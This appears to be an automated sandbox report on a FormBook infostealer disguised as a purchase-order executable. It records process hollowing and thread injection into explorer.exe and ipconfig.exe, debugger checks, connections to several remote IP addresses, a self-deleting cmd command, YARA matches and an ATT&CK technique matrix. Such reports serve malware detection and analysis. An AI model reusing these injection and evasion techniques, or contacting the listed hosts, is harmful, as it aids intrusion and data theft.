          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F32073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F41074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F31608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E88794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013ED6DE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E605C SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013DD3A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeNetwork Connect: 194.35.122.226 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.201.11.126 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.134.22.63 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.182.242 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.253.79.71 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.71.133.130 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.12.202.18 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.86.218.70 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 13.226.173.80 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Users\user\Desktop\Purchase Order 40,7045$.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3292
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 140000
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000002.00000000.254074114.0000000005F40000.00000004.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.501463213.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: GetLocaleInfoA,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013DC26F GetSystemTimeAsFileTime,__aulldiv,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemorySecurity Software Discovery141Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
